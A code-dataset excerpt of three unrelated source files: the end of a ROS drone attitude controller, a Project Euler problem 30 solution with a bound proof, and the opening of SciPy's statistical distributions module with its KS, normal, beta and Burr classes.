theta_d = (-asin(u[0,-1]))
ctrl = Control()
ctrl.name = states.Obj[0].name
ctrl.phi = phi_trim + phi_scale*phi_d
ctrl.theta = theta_trim + theta_scale*theta_d
ctrl.psi = -u[3,-1]/max_yaw_rate
global nominal_thrust
T_d = nominal_thrust+(T-g)/g
ctrl.T = T_d
Ctrl.Obj[0] = ctrl
Ctrl.header = states.header
#rospy.loginfo("latency = %f",states.header.stamp.to_sec()-rospy.get_time())
pub_ctrl.publish(Ctrl)
#===================#
# Main #
#===================#
if __name__=='__main__':
import sys
rospy.init_node('IRIS_DF_Controller')
#=====================================#
# Set up Publish/Subscribe Loop #
#=====================================#
r = rospy.Rate(rate)
while not rospy.is_shutdown():
sub_cortex = rospy.Subscriber('/cortex_raw' , Cortex, GetStates, queue_size=1, buff_size=2**24)
sub_traj = rospy.Subscriber('/trajectory' , Trajectories, GetTraj, queue_size=1, buff_size=2**24)
sub_Batt = rospy.Subscriber('/apm/status' , Status, GetBatt)
sub_status = rospy.Subscriber('/controller_status' , Bool, GetStatus)
Basic_Controller()
r.sleep()
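#==================================#
#   Illustrative Sketch (added)    #
#==================================#
# Not part of the original node: the attitude extraction in Basic_Controller
# reduced to a standalone numeric check. `u_acc` is a hypothetical commanded
# 3x1 acceleration; normalizing by the thrust magnitude and reading the
# components gives the roll/pitch setpoints before trim and scaling.
def attitude_from_accel(u_acc):
    T = float(np.sqrt(u_acc.T*u_acc))  # total thrust magnitude
    u_n = np.divide(u_acc, -T)         # unit vector along desired body z axis
    phi_d = asin(u_n[1, -1])           # roll from the y component
    theta_d = -asin(u_n[0, -1])        # pitch from the x component
    return T, phi_d, theta_d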
|
riscmaster/risc_maap
|
risc_control/src/IRIS_DF_Controller.py
|
Python
|
bsd-2-clause
| 6,110 | 0.022913 |
#!/usr/bin/env python
# coding=utf-8
# Python Script
#
# Copyleft © Manoel Vilela
#
#
from functools import reduce
"""
Digit fifth powers
Problem 30
Surprisingly there are only three numbers that can be written as the sum of fourth powers of their digits:
1634 = 1^4 + 6^4 + 3^4 + 4^4
8208 = 8^4 + 2^4 + 0^4 + 8^4
9474 = 9^4 + 4^4 + 7^4 + 4^4
As 1 = 1^4 is not a sum it is not included.
The sum of these numbers is 1634 + 8208 + 9474 = 19316.
Find the sum of all the numbers that can be written as the sum of fifth powers of their digits.
"""
""" Prova de um cara lá no fórum do PE sobre apenas ser necessário considerar números de 6 dígitos ou menos.
Proof that one need only consider numbers 6 digits or less:
If N has n digits, then 10^{n-1} <= N.
If N is the sum of the 5th powers of its digits, N <= n*9^5. Thus, 10^{n-1} <= n*9^5.
We now show by induction that if n>=7, then 10^{n-6} > n.
1) Basis step (n=7): 10^{7-6} = 10 > 7.
2) Induction step: suppose 10^{n-6} > n for some n>=7. Show this true for n+1 too. Well,
10^{(n+1)-6} = 10*10^{n-6} > 10n > 2n > n+1
QED.
It follows that if n>=7, then
10^{n-1} = 10^{n-6}*10^5 > n * 10^5 > n*9^5.
Hence the only way we can have 10^{n-1} <= n*9^5 is for n<=6.
"""
# This was pure luck.
# Initially I tried to think of a bound for testing -- it would be length*9**5 -- but I couldn't deduce the largest possible length.
# So I ran a few tests and found that numbers expressible as the sum of fifth powers of their digits
# only occur for digit counts in the interval [4, 7)
from itertools import combinations_with_replacement as c; from string import digits as d
n = lambda num, digits: sorted(str(num)) == sorted(digits)
p = lambda comb: sum([int(n) ** 5 for n in comb])
# start at length 2 so the trivial single-digit "sums" 0 and 1 are excluded
print(sum(set(reduce(list.__add__, ([p(cb) for cb in c(d, x) if n(p(cb), cb)] for x in range(2, 7))))))
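# Illustrative sketch (not part of the original solution): the same result by
# a direct scan up to the 6*9**5 bound established in the proof above; slower
# than the combinations trick but easier to verify.
def digit_fifth_power_sum(limit=6 * 9 ** 5):
    # start at 10 so the trivial single-digit "sums" 0 and 1 are excluded
    return sum(i for i in range(10, limit + 1)
               if i == sum(int(ch) ** 5 for ch in str(i)))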
|
DestructHub/ProjectEuler
|
Problem030/Python/solution_1.py
|
Python
|
mit
| 1,884 | 0.010144 |
# -*- coding: utf-8 -*-
#
# Author: Travis Oliphant 2002-2011 with contributions from
# SciPy Developers 2004-2011
#
from __future__ import division, print_function, absolute_import
import warnings
import numpy as np
from scipy._lib.doccer import (extend_notes_in_docstring,
replace_notes_in_docstring)
from scipy import optimize
from scipy import integrate
from scipy import interpolate
import scipy.special as sc
import scipy.special._ufuncs as scu
from scipy._lib._numpy_compat import broadcast_to
from scipy._lib._util import _lazyselect, _lazywhere
from . import _stats
from ._tukeylambda_stats import (tukeylambda_variance as _tlvar,
tukeylambda_kurtosis as _tlkurt)
from ._distn_infrastructure import (get_distribution_names, _kurtosis,
_ncx2_cdf, _ncx2_log_pdf, _ncx2_pdf,
rv_continuous, _skew, valarray,
_get_fixed_fit_value)
from ._constants import _XMIN, _EULER, _ZETA3, _XMAX, _LOGXMAX
# In numpy 1.12 and above, np.power refuses to raise integers to negative
# powers, and `np.float_power` is a new replacement.
try:
float_power = np.float_power
except AttributeError:
float_power = np.power
def _remove_optimizer_parameters(kwds):
"""
Remove the optimizer-related keyword arguments 'loc', 'scale' and
'optimizer' from `kwds`. Then check that `kwds` is empty, and
raise `TypeError("Unknown arguments: %s." % kwds)` if it is not.
This function is used in the fit method of distributions that override
the default method and do not use the default optimization code.
`kwds` is modified in-place.
"""
kwds.pop('loc', None)
kwds.pop('scale', None)
kwds.pop('optimizer', None)
if kwds:
raise TypeError("Unknown arguments: %s." % kwds)
## Kolmogorov-Smirnov one-sided and two-sided test statistics
class ksone_gen(rv_continuous):
r"""General Kolmogorov-Smirnov one-sided test.
This is the distribution of the one-sided Kolmogorov-Smirnov (KS)
statistics :math:`D_n^+` and :math:`D_n^-`
for a finite sample size ``n`` (the shape parameter).
%(before_notes)s
Notes
-----
:math:`D_n^+` and :math:`D_n^-` are given by
.. math::
D_n^+ &= \text{sup}_x (F_n(x) - F(x)),\\
D_n^- &= \text{sup}_x (F(x) - F_n(x)),\\
where :math:`F` is a CDF and :math:`F_n` is an empirical CDF. `ksone`
describes the distribution under the null hypothesis of the KS test
that the empirical CDF corresponds to :math:`n` i.i.d. random variates
with CDF :math:`F`.
%(after_notes)s
See Also
--------
kstwobign, kstest
References
----------
.. [1] Birnbaum, Z. W. and Tingey, F.H. "One-sided confidence contours
for probability distribution functions", The Annals of Mathematical
Statistics, 22(4), pp 592-596 (1951).
%(example)s
"""
def _pdf(self, x, n):
return -scu._smirnovp(n, x)
def _cdf(self, x, n):
return scu._smirnovc(n, x)
def _sf(self, x, n):
return sc.smirnov(n, x)
def _ppf(self, q, n):
return scu._smirnovci(n, q)
def _isf(self, q, n):
return sc.smirnovi(n, q)
ksone = ksone_gen(a=0.0, b=1.0, name='ksone')
class kstwobign_gen(rv_continuous):
r"""Kolmogorov-Smirnov two-sided test for large N.
This is the asymptotic distribution of the two-sided Kolmogorov-Smirnov
statistic :math:`\sqrt{n} D_n` that measures the maximum absolute
distance of the theoretical CDF from the empirical CDF (see `kstest`).
%(before_notes)s
Notes
-----
:math:`\sqrt{n} D_n` is given by
.. math::
D_n = \text{sup}_x |F_n(x) - F(x)|
where :math:`F` is a CDF and :math:`F_n` is an empirical CDF. `kstwobign`
describes the asymptotic distribution (i.e. the limit of
:math:`\sqrt{n} D_n`) under the null hypothesis of the KS test that the
empirical CDF corresponds to i.i.d. random variates with CDF :math:`F`.
%(after_notes)s
See Also
--------
ksone, kstest
References
----------
.. [1] Marsaglia, G. et al. "Evaluating Kolmogorov's distribution",
Journal of Statistical Software, 8(18), 2003.
%(example)s
"""
def _pdf(self, x):
return -scu._kolmogp(x)
def _cdf(self, x):
return scu._kolmogc(x)
def _sf(self, x):
return sc.kolmogorov(x)
def _ppf(self, q):
return scu._kolmogci(q)
def _isf(self, q):
return sc.kolmogi(q)
kstwobign = kstwobign_gen(a=0.0, name='kstwobign')
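# Illustrative sketch (not part of the original file): the asymptotic
# two-sided KS p-value is the kstwobign survival function evaluated at
# sqrt(n) * D_n. Sample size and statistic below are hypothetical.
def _kstwobign_sketch():
    n, D_n = 100, 0.12
    return kstwobign.sf(np.sqrt(n) * D_n)   # ~0.11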
## Normal distribution
# loc = mu, scale = std
# Keep these implementations out of the class definition so they can be reused
# by other distributions.
_norm_pdf_C = np.sqrt(2*np.pi)
_norm_pdf_logC = np.log(_norm_pdf_C)
def _norm_pdf(x):
return np.exp(-x**2/2.0) / _norm_pdf_C
def _norm_logpdf(x):
return -x**2 / 2.0 - _norm_pdf_logC
def _norm_cdf(x):
return sc.ndtr(x)
def _norm_logcdf(x):
return sc.log_ndtr(x)
def _norm_ppf(q):
return sc.ndtri(q)
def _norm_sf(x):
return _norm_cdf(-x)
def _norm_logsf(x):
return _norm_logcdf(-x)
def _norm_isf(q):
return -_norm_ppf(q)
class norm_gen(rv_continuous):
r"""A normal continuous random variable.
The location (``loc``) keyword specifies the mean.
The scale (``scale``) keyword specifies the standard deviation.
%(before_notes)s
Notes
-----
The probability density function for `norm` is:
.. math::
f(x) = \frac{\exp(-x^2/2)}{\sqrt{2\pi}}
for a real number :math:`x`.
%(after_notes)s
%(example)s
"""
def _rvs(self):
return self._random_state.standard_normal(self._size)
def _pdf(self, x):
# norm.pdf(x) = exp(-x**2/2)/sqrt(2*pi)
return _norm_pdf(x)
def _logpdf(self, x):
return _norm_logpdf(x)
def _cdf(self, x):
return _norm_cdf(x)
def _logcdf(self, x):
return _norm_logcdf(x)
def _sf(self, x):
return _norm_sf(x)
def _logsf(self, x):
return _norm_logsf(x)
def _ppf(self, q):
return _norm_ppf(q)
def _isf(self, q):
return _norm_isf(q)
def _stats(self):
return 0.0, 1.0, 0.0, 0.0
def _entropy(self):
return 0.5*(np.log(2*np.pi)+1)
@replace_notes_in_docstring(rv_continuous, notes="""\
This function uses explicit formulas for the maximum likelihood
estimation of the normal distribution parameters, so the
`optimizer` argument is ignored.\n\n""")
def fit(self, data, **kwds):
floc = kwds.pop('floc', None)
fscale = kwds.pop('fscale', None)
_remove_optimizer_parameters(kwds)
if floc is not None and fscale is not None:
# This check is for consistency with `rv_continuous.fit`.
# Without this check, this function would just return the
# parameters that were given.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
data = np.asarray(data)
if floc is None:
loc = data.mean()
else:
loc = floc
if fscale is None:
scale = np.sqrt(((data - loc)**2).mean())
else:
scale = fscale
return loc, scale
norm = norm_gen(name='norm')
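# Illustrative sketch (not part of the original file): norm.fit uses the
# closed-form MLEs above, so it matches the sample mean and the biased
# (ddof=0) root mean squared deviation computed directly. Data below are
# hypothetical.
def _norm_fit_sketch():
    data = np.array([1.0, 2.0, 4.0, 7.0])
    loc, scale = norm.fit(data)
    # loc == data.mean() == 3.5
    # scale == np.sqrt(((data - loc)**2).mean()) ~= 2.2913
    return loc, scale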
class alpha_gen(rv_continuous):
r"""An alpha continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `alpha` ([1]_, [2]_) is:
.. math::
f(x, a) = \frac{1}{x^2 \Phi(a) \sqrt{2\pi}} *
\exp(-\frac{1}{2} (a-1/x)^2)
where :math:`\Phi` is the normal CDF, :math:`x > 0`, and :math:`a > 0`.
`alpha` takes ``a`` as a shape parameter.
%(after_notes)s
References
----------
.. [1] Johnson, Kotz, and Balakrishnan, "Continuous Univariate
Distributions, Volume 1", Second Edition, John Wiley and Sons,
p. 173 (1994).
.. [2] Anthony A. Salvia, "Reliability applications of the Alpha
Distribution", IEEE Transactions on Reliability, Vol. R-34,
No. 3, pp. 251-252 (1985).
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _pdf(self, x, a):
# alpha.pdf(x, a) = 1/(x**2*Phi(a)*sqrt(2*pi)) * exp(-1/2 * (a-1/x)**2)
return 1.0/(x**2)/_norm_cdf(a)*_norm_pdf(a-1.0/x)
def _logpdf(self, x, a):
return -2*np.log(x) + _norm_logpdf(a-1.0/x) - np.log(_norm_cdf(a))
def _cdf(self, x, a):
return _norm_cdf(a-1.0/x) / _norm_cdf(a)
def _ppf(self, q, a):
return 1.0/np.asarray(a-sc.ndtri(q*_norm_cdf(a)))
def _stats(self, a):
return [np.inf]*2 + [np.nan]*2
alpha = alpha_gen(a=0.0, name='alpha')
class anglit_gen(rv_continuous):
r"""An anglit continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `anglit` is:
.. math::
f(x) = \sin(2x + \pi/2) = \cos(2x)
for :math:`-\pi/4 \le x \le \pi/4`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# anglit.pdf(x) = sin(2*x + \pi/2) = cos(2*x)
return np.cos(2*x)
def _cdf(self, x):
return np.sin(x+np.pi/4)**2.0
def _ppf(self, q):
return np.arcsin(np.sqrt(q))-np.pi/4
def _stats(self):
return 0.0, np.pi*np.pi/16-0.5, 0.0, -2*(np.pi**4 - 96)/(np.pi*np.pi-8)**2
def _entropy(self):
return 1-np.log(2)
anglit = anglit_gen(a=-np.pi/4, b=np.pi/4, name='anglit')
class arcsine_gen(rv_continuous):
r"""An arcsine continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `arcsine` is:
.. math::
f(x) = \frac{1}{\pi \sqrt{x (1-x)}}
for :math:`0 < x < 1`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x):
# arcsine.pdf(x) = 1/(pi*sqrt(x*(1-x)))
return 1.0/np.pi/np.sqrt(x*(1-x))
def _cdf(self, x):
return 2.0/np.pi*np.arcsin(np.sqrt(x))
def _ppf(self, q):
return np.sin(np.pi/2.0*q)**2.0
def _stats(self):
mu = 0.5
mu2 = 1.0/8
g1 = 0
g2 = -3.0/2.0
return mu, mu2, g1, g2
def _entropy(self):
return -0.24156447527049044468
arcsine = arcsine_gen(a=0.0, b=1.0, name='arcsine')
class FitDataError(ValueError):
# This exception is raised by, for example, beta_gen.fit when both floc
# and fscale are fixed and there are values in the data not in the open
# interval (floc, floc+fscale).
def __init__(self, distr, lower, upper):
self.args = (
"Invalid values in `data`. Maximum likelihood "
"estimation with {distr!r} requires that {lower!r} < x "
"< {upper!r} for each x in `data`.".format(
distr=distr, lower=lower, upper=upper),
)
class FitSolverError(RuntimeError):
# This exception is raised by, for example, beta_gen.fit when
# optimize.fsolve returns with ier != 1.
def __init__(self, mesg):
emsg = "Solver for the MLE equations failed to converge: "
emsg += mesg.replace('\n', '')
self.args = (emsg,)
def _beta_mle_a(a, b, n, s1):
# The zeros of this function give the MLE for `a`, with
# `b`, `n` and `s1` given. `s1` is the sum of the logs of
# the data. `n` is the number of data points.
psiab = sc.psi(a + b)
func = s1 - n * (-psiab + sc.psi(a))
return func
def _beta_mle_ab(theta, n, s1, s2):
# Zeros of this function are critical points of
# the maximum likelihood function. Solving this system
# for theta (which contains a and b) gives the MLE for a and b
# given `n`, `s1` and `s2`. `s1` is the sum of the logs of the data,
# and `s2` is the sum of the logs of 1 - data. `n` is the number
# of data points.
a, b = theta
psiab = sc.psi(a + b)
func = [s1 - n * (-psiab + sc.psi(a)),
s2 - n * (-psiab + sc.psi(b))]
return func
class beta_gen(rv_continuous):
r"""A beta continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `beta` is:
.. math::
f(x, a, b) = \frac{\Gamma(a+b) x^{a-1} (1-x)^{b-1}}
{\Gamma(a) \Gamma(b)}
for :math:`0 <= x <= 1`, :math:`a > 0`, :math:`b > 0`, where
:math:`\Gamma` is the gamma function (`scipy.special.gamma`).
`beta` takes :math:`a` and :math:`b` as shape parameters.
%(after_notes)s
%(example)s
"""
def _rvs(self, a, b):
return self._random_state.beta(a, b, self._size)
def _pdf(self, x, a, b):
# gamma(a+b) * x**(a-1) * (1-x)**(b-1)
# beta.pdf(x, a, b) = ------------------------------------
# gamma(a)*gamma(b)
return np.exp(self._logpdf(x, a, b))
def _logpdf(self, x, a, b):
lPx = sc.xlog1py(b - 1.0, -x) + sc.xlogy(a - 1.0, x)
lPx -= sc.betaln(a, b)
return lPx
def _cdf(self, x, a, b):
return sc.btdtr(a, b, x)
def _ppf(self, q, a, b):
return sc.btdtri(a, b, q)
def _stats(self, a, b):
mn = a*1.0 / (a + b)
var = (a*b*1.0)/(a+b+1.0)/(a+b)**2.0
g1 = 2.0*(b-a)*np.sqrt((1.0+a+b)/(a*b)) / (2+a+b)
g2 = 6.0*(a**3 + a**2*(1-2*b) + b**2*(1+b) - 2*a*b*(2+b))
g2 /= a*b*(a+b+2)*(a+b+3)
return mn, var, g1, g2
def _fitstart(self, data):
g1 = _skew(data)
g2 = _kurtosis(data)
def func(x):
a, b = x
sk = 2*(b-a)*np.sqrt(a + b + 1) / (a + b + 2) / np.sqrt(a*b)
ku = a**3 - a**2*(2*b-1) + b**2*(b+1) - 2*a*b*(b+2)
ku /= a*b*(a+b+2)*(a+b+3)
ku *= 6
return [sk-g1, ku-g2]
a, b = optimize.fsolve(func, (1.0, 1.0))
return super(beta_gen, self)._fitstart(data, args=(a, b))
@extend_notes_in_docstring(rv_continuous, notes="""\
In the special case where both `floc` and `fscale` are given, a
`ValueError` is raised if any value `x` in `data` does not satisfy
`floc < x < floc + fscale`.\n\n""")
def fit(self, data, *args, **kwds):
# Override rv_continuous.fit, so we can more efficiently handle the
# case where floc and fscale are given.
floc = kwds.get('floc', None)
fscale = kwds.get('fscale', None)
if floc is None or fscale is None:
# do general fit
return super(beta_gen, self).fit(data, *args, **kwds)
# We already got these from kwds, so just pop them.
kwds.pop('floc', None)
kwds.pop('fscale', None)
f0 = _get_fixed_fit_value(kwds, ['f0', 'fa', 'fix_a'])
f1 = _get_fixed_fit_value(kwds, ['f1', 'fb', 'fix_b'])
_remove_optimizer_parameters(kwds)
if f0 is not None and f1 is not None:
# This check is for consistency with `rv_continuous.fit`.
raise ValueError("All parameters fixed. There is nothing to "
"optimize.")
# Special case: loc and scale are constrained, so we are fitting
# just the shape parameters. This can be done much more efficiently
# than the method used in `rv_continuous.fit`. (See the subsection
# "Two unknown parameters" in the section "Maximum likelihood" of
# the Wikipedia article on the Beta distribution for the formulas.)
# Normalize the data to the interval [0, 1].
data = (np.ravel(data) - floc) / fscale
if np.any(data <= 0) or np.any(data >= 1):
raise FitDataError("beta", lower=floc, upper=floc + fscale)
xbar = data.mean()
if f0 is not None or f1 is not None:
# One of the shape parameters is fixed.
if f0 is not None:
# The shape parameter a is fixed, so swap the parameters
# and flip the data. We always solve for `a`. The result
# will be swapped back before returning.
b = f0
data = 1 - data
xbar = 1 - xbar
else:
b = f1
# Initial guess for a. Use the formula for the mean of the beta
# distribution, E[x] = a / (a + b), to generate a reasonable
# starting point based on the mean of the data and the given
# value of b.
a = b * xbar / (1 - xbar)
# Compute the MLE for `a` by solving _beta_mle_a.
theta, info, ier, mesg = optimize.fsolve(
_beta_mle_a, a,
args=(b, len(data), np.log(data).sum()),
full_output=True
)
if ier != 1:
raise FitSolverError(mesg=mesg)
a = theta[0]
if f0 is not None:
# The shape parameter a was fixed, so swap back the
# parameters.
a, b = b, a
else:
# Neither of the shape parameters is fixed.
# s1 and s2 are used in the extra arguments passed to _beta_mle_ab
# by optimize.fsolve.
s1 = np.log(data).sum()
s2 = sc.log1p(-data).sum()
# Use the "method of moments" to estimate the initial
# guess for a and b.
fac = xbar * (1 - xbar) / data.var(ddof=0) - 1
a = xbar * fac
b = (1 - xbar) * fac
# Compute the MLE for a and b by solving _beta_mle_ab.
theta, info, ier, mesg = optimize.fsolve(
_beta_mle_ab, [a, b],
args=(len(data), s1, s2),
full_output=True
)
if ier != 1:
raise FitSolverError(mesg=mesg)
a, b = theta
return a, b, floc, fscale
beta = beta_gen(a=0.0, b=1.0, name='beta')
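# Illustrative sketch (not part of the original file): fixing both floc and
# fscale makes beta.fit take the fast path above -- a method-of-moments
# starting point refined by fsolve on the MLE equations -- instead of the
# generic numerical optimizer. Data below are hypothetical values in (0, 1).
def _beta_fit_sketch():
    data = np.array([0.1, 0.3, 0.4, 0.6, 0.8])
    a, b, loc, scale = beta.fit(data, floc=0, fscale=1)
    return a, b   # loc and scale come back as the fixed 0 and 1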
class betaprime_gen(rv_continuous):
r"""A beta prime continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `betaprime` is:
.. math::
f(x, a, b) = \frac{x^{a-1} (1+x)^{-a-b}}{\beta(a, b)}
for :math:`x >= 0`, :math:`a > 0`, :math:`b > 0`, where
:math:`\beta(a, b)` is the beta function (see `scipy.special.beta`).
`betaprime` takes ``a`` and ``b`` as shape parameters.
%(after_notes)s
%(example)s
"""
_support_mask = rv_continuous._open_support_mask
def _rvs(self, a, b):
sz, rndm = self._size, self._random_state
u1 = gamma.rvs(a, size=sz, random_state=rndm)
u2 = gamma.rvs(b, size=sz, random_state=rndm)
return u1 / u2
def _pdf(self, x, a, b):
# betaprime.pdf(x, a, b) = x**(a-1) * (1+x)**(-a-b) / beta(a, b)
return np.exp(self._logpdf(x, a, b))
def _logpdf(self, x, a, b):
return sc.xlogy(a - 1.0, x) - sc.xlog1py(a + b, x) - sc.betaln(a, b)
def _cdf(self, x, a, b):
return sc.betainc(a, b, x/(1.+x))
def _munp(self, n, a, b):
if n == 1.0:
return np.where(b > 1,
a/(b-1.0),
np.inf)
elif n == 2.0:
return np.where(b > 2,
a*(a+1.0)/((b-2.0)*(b-1.0)),
np.inf)
elif n == 3.0:
return np.where(b > 3,
a*(a+1.0)*(a+2.0)/((b-3.0)*(b-2.0)*(b-1.0)),
np.inf)
elif n == 4.0:
return np.where(b > 4,
(a*(a + 1.0)*(a + 2.0)*(a + 3.0) /
((b - 4.0)*(b - 3.0)*(b - 2.0)*(b - 1.0))),
np.inf)
else:
raise NotImplementedError
betaprime = betaprime_gen(a=0.0, name='betaprime')
class bradford_gen(rv_continuous):
r"""A Bradford continuous random variable.
%(before_notes)s
Notes
-----
The probability density function for `bradford` is:
.. math::
f(x, c) = \frac{c}{\log(1+c) (1+cx)}
for :math:`0 <= x <= 1` and :math:`c > 0`.
`bradford` takes ``c`` as a shape parameter for :math:`c`.
%(after_notes)s
%(example)s
"""
def _pdf(self, x, c):
# bradford.pdf(x, c) = c / (k * (1+c*x))
return c / (c*x + 1.0) / sc.log1p(c)
def _cdf(self, x, c):
return sc.log1p(c*x) / sc.log1p(c)
def _ppf(self, q, c):
return sc.expm1(q * sc.log1p(c)) / c
def _stats(self, c, moments='mv'):
k = np.log(1.0+c)
mu = (c-k)/(c*k)
mu2 = ((c+2.0)*k-2.0*c)/(2*c*k*k)
g1 = None
g2 = None
if 's' in moments:
g1 = np.sqrt(2)*(12*c*c-9*c*k*(c+2)+2*k*k*(c*(c+3)+3))
g1 /= np.sqrt(c*(c*(k-2)+2*k))*(3*c*(k-2)+6*k)
if 'k' in moments:
g2 = (c**3*(k-3)*(k*(3*k-16)+24)+12*k*c*c*(k-4)*(k-3) +
6*c*k*k*(3*k-14) + 12*k**3)
g2 /= 3*c*(c*(k-2)+2*k)**2
return mu, mu2, g1, g2
def _entropy(self, c):
k = np.log(1+c)
return k/2.0 - np.log(c/k)
bradford = bradford_gen(a=0.0, b=1.0, name='bradford')
class burr_gen(rv_continuous):
r"""A Burr (Type III) continuous random variable.
%(before_notes)s
See Also
--------
fisk : a special case of either `burr` or `burr12` with ``d=1``
burr12 : Burr Type XII distribution
mielke : Mielke Beta-Kappa / Dagum distribution
Notes
-----
The probability density function for `burr` is:
.. math::
f(x, c, d) = c d x^{-c - 1} / (1 + x^{-c})^{d + 1}
for :math:`x >= 0` and :math:`c, d > 0`.
`burr` takes :math:`c` and :math:`d` as shape parameters.
This is the PDF corresponding to the third CDF given in Burr's list;
specifically, it is equation (11) in Burr's paper [1]_. The distribution
is also commonly referred to as the Dagum distribution [2]_. If the
parameter :math:`c < 1` then the mean of the distribution does not
exist and if :math:`c < 2` the variance does not exist [2]_.
The PDF is finite at the left endpoint :math:`x = 0` if :math:`c * d >= 1`.
%(after_notes)s
References
----------
.. [1] Burr, I. W. "Cumulative frequency functions", Annals of
Mathematical Statistics, 13(2), pp 215-232 (1942).
.. [2] https://en.wikipedia.org/wiki/Dagum_distribution
.. [3] Kleiber, Christian. "A guide to the Dagum distributions."
Modeling Income Distributions and Lorenz Curves pp 97-117 (2008).
%(example)s
"""
# Do not set _support_mask to rv_continuous._open_support_mask
# Whether the left-hand endpoint is suitable for pdf evaluation is dependent
# on the values of c and d: if c*d >= 1, the pdf is finite, otherwise infinite.
def _pdf(self, x, c, d):
# burr.pdf(x, c, d) = c * d * x**(-c-1) * (1+x**(-c))**(-d-1)
output = _lazywhere(x == 0, [x, c, d],
lambda x_, c_, d_: c_ * d_ * (x_**(c_*d_-1)) / (1 + x_**c_),
f2 = lambda x_, c_, d_: (c_ * d_ * (x_ ** (-c_ - 1.0)) /
((1 + x_ ** (-c_)) ** (d_ + 1.0))))
if output.ndim == 0:
return output[()]
return output
def _logpdf(self, x, c, d):
output = _lazywhere(
x == 0, [x, c, d],
lambda x_, c_, d_: (np.log(c_) + np.log(d_) + sc.xlogy(c_*d_ - 1, x_)
- (d_+1) * sc.log1p(x_**(c_))),
f2 = lambda x_, c_, d_: (np.log(c_) + np.log(d_)
+ sc.xlogy(-c_ - 1, x_)
- sc.xlog1py(d_+1, x_**(-c_))))
if output.ndim == 0:
return output[()]
return output
def _cdf(self, x, c, d):
return (1 + x**(-c))**(-d)
def _logcdf(self, x, c, d):
return sc.log1p(x**(-c)) * (-d)
def _sf(self, x, c, d):
return np.exp(self._logsf(x, c, d))
def _logsf(self, x, c, d):
return np.log1p(- (1 + x**(-c))**(-d))
def _ppf(self, q, c, d):
return (q**(-1.0/d) - 1)**(-1.0/c)
def _stats(self, c, d):
nc = np.arange(1, 5).reshape(4,1) / c
        # e_k is the k-th raw moment; e1 is the mean, e2 - e1**2 the variance, etc.
e1, e2, e3, e4 = sc.beta(d + nc, 1. - nc) * d
mu = np.where(c > 1.0, e1, np.nan)
mu2_if_c = e2 - mu**2
mu2 = np.where(c > 2.0, mu2_if_c, np.nan)
g1 = _lazywhere(
c > 3.0,
(c, e1, e2, e3, mu2_if_c),
lambda c, e1, e2, e3, mu2_if_c: (e3 - 3*e2*e1 + 2*e1**3) / np.sqrt((mu2_if_c)**3),
fillvalue=np.nan)
g2 = _lazywhere(
c > 4.0,
(c, e1, e2, e3, e4, mu2_if_c),
lambda c, e1, e2, e3, e4, mu2_if_c: (
((e4 - 4*e3*e1 + 6*e2*e1**2 - 3*e1**4) / mu2_if_c**2) - 3),
fillvalue=np.nan)
return mu, mu2, g1, g2
def _munp(self, n, c, d):
def __munp(n, c, d):
nc = 1. * n / c
return d * sc.beta(1.0 - nc, d + nc)
n, c, d = np.asarray(n), np.asarray(c), np.asarray(d)
return _lazywhere((c > n) & (n == n) & (d == d), (c, d, n),
lambda c, d, n: __munp(n, c, d),
np.nan)
burr = burr_gen(a=0.0, name='burr')
class burr12_gen(rv_continuous):
r"""A Burr (Type XII) continuous random variable.
%(before_notes)s
See Also
--------
fisk : a special case of either `burr` or `burr12` with ``d=1``
burr : Burr Type III distribution
Notes
-----
    The probability density function for `burr12` is:
.. math::
f(x, c, d) = c d x^{c-1} / (1 + x^c)^{d + 1}
for :math:`x >= 0` and :math:`c, d > 0`.
`burr12` takes ``c`` and ``d`` as shape parameters for :math:`c`
and :math:`d`.
This is the PDF corresponding to the twelfth CDF given in Burr's list;
specifically, it is equation (20) in Burr's paper [1]_.
%(after_notes)s
The Burr type 12 distribution is also sometimes referred to as
the Singh-Maddala distribution from NIST [2]_.
References
----------
.. [1] Burr, I. W. "Cumulative frequency functions", Annals of
Mathematical Statistics, 13(2), pp 215-232 (1942).
.. [2] https://www.itl.nist.gov/div898/software/dataplot/refman2/auxillar/b12pdf.htm
.. [3] "Burr distribution",
https://en.wikipedia.org/wiki/Burr_distribution
%(example)s
"""
def _pdf(self, x, c, d):
# burr12.pdf(x, c, d) = c * d * x**(c-1) * (1+x**(c))**(-d-1)
return np.exp(self._logpdf(x, c, d))
def _logpdf(self, x, c, d):
return np.log(c) + np.log(d) + sc.xlogy(c - 1, x) + sc.xlog1py(-d-1, x**c)
def _cdf(self, x, c, d):
return -sc.expm1(self._logsf(x, c, d))
def _logcdf(self, x, c, d):
return sc.log1p(-(1 + x**c)**(-d))
def _sf(self, x, c, d):
return np.exp(self._logsf(x, c, d))
def _logsf(self, x, c, d):
return sc.xlog1py(-d, x**c)
def _ppf(self, q, c, d):
# The following is an implementation of
# ((1 - q)**(-1.0/d) - 1)**(1.0/c)
# that does a better job handling small values of q.
return sc.expm1(-1/d * sc.log1p(-q))**(1/c)
def _munp(self, n, c, d):
nc = 1. * n / c
return d * sc.beta(1.0 + nc, d - nc)
burr12 = burr12_gen(a=0.0, name='burr12')
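# Illustrative sketch (not part of the original file): why burr12._ppf uses
# the expm1/log1p identity above -- for q near 0 the naive form
# ((1 - q)**(-1/d) - 1)**(1/c) cancels catastrophically, while the rewritten
# form keeps full precision. Values below are hypothetical.
def _burr12_ppf_sketch(q=1e-15, c=2.0, d=3.0):
    naive = ((1 - q)**(-1.0/d) - 1)**(1.0/c)            # ~2.1e-8, mostly rounding noise
    stable = sc.expm1(-1.0/d * sc.log1p(-q))**(1.0/c)   # ~1.8257e-8, correct
    return naive, stable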
class fisk_gen(burr_gen):
r"""A Fisk continuous random variable.
The Fisk distribution is also known as the log-logistic distribution.
%(before_notes)s
Notes
-----
The probability density function for `fisk` is:
.. math::
f(x, c) = c x^{-c-1} (1 + x^{-c})^{-2}
for :math:`x >= 0` and :math:`c > 0`.
`fisk` takes ``c`` as a shape parameter for :math:`c`.
`fisk` is a special case of `burr` or `burr12` with ``d=1``.
%(after_notes)s
See Also
--------
burr
%(example)s
"""
def _pdf(self, x, c):
# fisk.pdf(x, c) = c * x**(-c-1) * (1 + x**(-c))**(-2)
